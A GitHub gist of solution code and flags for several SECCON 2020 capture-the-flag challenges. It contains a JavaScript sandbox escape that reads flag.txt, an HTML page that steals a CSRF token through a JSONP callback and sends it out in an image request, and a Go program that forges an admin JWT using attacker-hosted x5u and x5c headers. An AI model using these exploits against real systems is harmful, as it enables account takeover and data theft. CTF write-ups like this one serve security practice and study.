Skip to content

Instantly share code, notes, and snippets.

@po6ix
Last active October 11, 2020 07:23
Show Gist options
  • Save po6ix/4af76691ea379957f9e8d68e002ec123 to your computer and use it in GitHub Desktop.
Save po6ix/4af76691ea379957f9e8d68e002ec123 to your computer and use it in GitHub Desktop.
function WeakMap(...e) {
return {
set: (...e)=>{
console.log(e)
},
has: () => {
console.log(87)
return 1;
}
}
}
// SECCON{Player_WorldOfFantasy_StereoWorXxX_CapsLock_WaveRunner}
function require() {
console.log(process.mainModule.load('./flag.txt'))
}
// SECCON{HighCollarGirl_CutieCinem@Replay_PhonyPhonic_S.F.SoundFurniture}
<script>
setTimeout(() => {
location = '/2.html';
}, 100);
</script>
<iframe src="https://milk.chal.seccon.jp/note.php?_=sdafhuiohsadfhbioujhsadifohfsdiauoh"></iframe>
<script>
function csrfTokenCallback(s) {
// SECCON{I_am_heavily_concerning_about_unintended_sols_so_I_dont_put_any_spoiler_here_but_anyway_congrats!}
(new Image).src = '/token?' + encodeURIComponent(s);
}
</script>
<script src="https://milk-api.chal.seccon.jp/csrf-token?_=sdafhuiohsadfhbioujhsadifohfsdiauoh"></script>

same with milk

SECCON{Okay_there_was_actually_unintended_solution_as_I_intended_blahblah}
// add u5u, x5c both to jwt header and bruteforce
// SECCON{1_w0uLd_L1K3_70_347_r4M3N_1N5734d_0f_p4574}
package main
import (
"crypto/x509"
"encoding/pem"
"fmt"
"io/ioutil"
"github.com/dgrijalva/jwt-go"
)
func main() {
// user generated
rawPrivateKey, err := ioutil.ReadFile("../service-b/service-b.key")
if err != nil {
fmt.Printf("error 1")
return
}
privateKeyBlock, _ := pem.Decode(rawPrivateKey)
privateKey, err := x509.ParsePKCS1PrivateKey(privateKeyBlock.Bytes)
if err != nil {
return
}
claims := jwt.MapClaims{
"sub": "22222222222",
"role": "admin",
"issuer": "service-b",
}
token := jwt.NewWithClaims(jwt.SigningMethodRS256, claims)
// user generated and hosted
token.Header["x5u"] = "https://p6.is/service-b.crt"
// from jwt header server gives
token.Header["x5c"] = []string{"MIIFPDCCAyQCFFEs6vyyH9KY4JpsT8W7/hRTyY9dMA0GCSqGSIb3DQEBCwUAMFcxCzAJBgNVBAYTAkpQMQ4wDAYDVQQIDAVUb2t5bzEPMA0GA1UECgwGU0VDQ09OMQswCQYDVQQLDAJDQTEaMBgGA1UEAwwRY2Euc2VjY29uLmV4YW1wbGUwHhcNMjAxMDEwMDM0MjE0WhcNMjMwNzA3MDM0MjE0WjBeMQswCQYDVQQGEwJKUDEOMAwGA1UECAwFVG9reW8xDzANBgNVBAoMBlNFQ0NPTjELMAkGA1UECwwCQ0ExITAfBgNVBAMMGHNlcnZpY2UtYi5zZWNjb24uZXhhbXBsZTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBALj+zVp0vU0cMIvaJpf6BqTnyGdVty+ec3V7a640emrAh2sQ8Ya0FhDfs5sohfTbndK0XSMrmufe0Wlc4PS9RxX/6Vder/IX3hrxlVMMcIw4mPA+Jzv1hFmmlHfU4p2mkGREV32Be8aGfKB4+JcjNOSOCC+YttR+T+ynClGWVnjdxuHJTFnW50jsQgtJDVtSU/JmNlxCWQKc4az3lIAkRi8SoIEnPlrmEtqAFZXUlwqGAaePdhX+ygXlQEwYqF8+RyOpiYZrX9Wb5X3B94ujvI5kE3oVa3yzBPfQTMHakL0F1QwsKLAbC1wmrjR4EbQ+Xh5hYfkEW7jCLM1Qc1/aKykl7wHnhUztztSv+Ra4AYPJ49qGsACHRWJzSH8/gwmYK7dsGroqaZWfWHcw5cW1CE7Hn2fvTRtmTjxTRka/wI5U0aWG+PG7U7vntR+staxmCqaEXeyZ7QMNlCQJbHBvgkNbBRqPFLjUNKWr+qJpzO+GQ4B2U/6F1FqNdojSmWtckfjkBaztW1Ff9kXEhpMPVDVBzkYeYmDSi53e9joN+mNmFxOHpL8eXEdiWk8PA0OWOGSkVoRlj4sOX09hg6kYHbudyihNhTyv80FNhl1T+YI4O85R2i2DcudY6fffG7dSbkL7eaR+YUt+LSX3x26XMYRfrsrS9jVBh7GWFoM9ctmfAgMBAAEwDQYJKoZIhvcNAQELBQADggIBAAf5ro53BRGu8pU7CldUtL2JXNE364NVcjmirVDiwtyKoEeeyEz5K+WEl5RybiHvkHYnh0xH/Y14KYHNUypC4t2IJtsompaARUBZ7xx2YA0vHVkjmXwm96fbh5sUKLJfpt8gp/L57idWHnmOqlzS19n1gcsg/oE8mEJx70UIQTbT3eHGDxxhVujIqjxNJLaEop1vC+CSWtfoGzkvC5wt5krAlVRDjwPnLSKIPa52nrW9npnCOHYl4YYoXH5PS9RESHmVdW9y9jt/yzSIwisJRVCaBupBAcMmgDVnD1861Fb50Vf4ZN2DJrGSdtAN/QINnLtDW5vwn3zHNbGQSiAEnFhQSSx//jtD37kK/9AIslCgmH+NeVZ8i3mE/Vkl4CBYLmDjYdwt+OmrfM36eOiA5NkEfwevox6T8GGHop1lIsC/ERIh9hAkv5P2x21p6RBUWr4XpaHCdMnq+zknWsFuWXcGYRZ77AYZuiZx8xDIjAqqQHGNJbaalckw1xSS0WBE8nI2C0Wkm8cEQjSHLfV4vjT1Pd1taDSyVW2jsgqNIr8kQs1Hc1ivwEbwp/o9FlEcMc+sSVjRqZbymkpV5XcgDMvsyevMDmpMB622n9sZo6WhFBULUv78DR2pYxbFrnCOIdrGIpG5whX/eNjRG8fx8bibFUINYtZlvJLpHGAJ8rg2"}
tokenStr, err := token.SignedString(privateKey)
fmt.Printf("%s\n", tokenStr)
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment